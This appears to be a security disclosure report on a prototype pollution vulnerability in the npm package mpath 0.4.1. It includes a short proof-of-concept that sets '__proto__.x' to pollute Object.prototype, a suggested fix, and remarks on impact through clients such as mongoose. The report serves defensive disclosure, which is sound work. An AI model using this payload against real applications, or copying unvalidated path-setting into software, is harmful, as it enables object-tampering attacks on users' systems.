I would like to report prototype pollution vulnerability in mpath.
It allows an attacker to inject arbitrary properties on Object.prototype.

Module

module name: mpathversion:0.4.1npm page: https://www.npmjs.com/package/mpath

Module Description

{G,S}et javascript object values using MongoDB-like path notatio

Module Stats

305,874 downloads in the last week

Vulnerability

Vulnerability Description

An attacker can specify a path that include the prototype object, and thus overwrite important properties on Object.prototype or add new ones.

Steps To Reproduce:

var mpath = require("mpath");
var obj = {
    comments: [
        { title: 'funny' },
        { title: 'exciting!' }
    ]
}
mpath.set('__proto__.x', ['hilarious', 'fruity'], obj);
console.log({}.x); 

Patch

N/A validate property names before overwriting them and prevent write to certain paths.

Wrap up

• I contacted the maintainer to let them know: [N
• I opened an issue in the related repository: N

Impact

This may be an intended behaviour of this module, but it needs to be better documented. Moreover, to properly analyse the impact of this vulnerability one must look at the clients of this module, such as mongoose and see if attackers can realistically control the path value.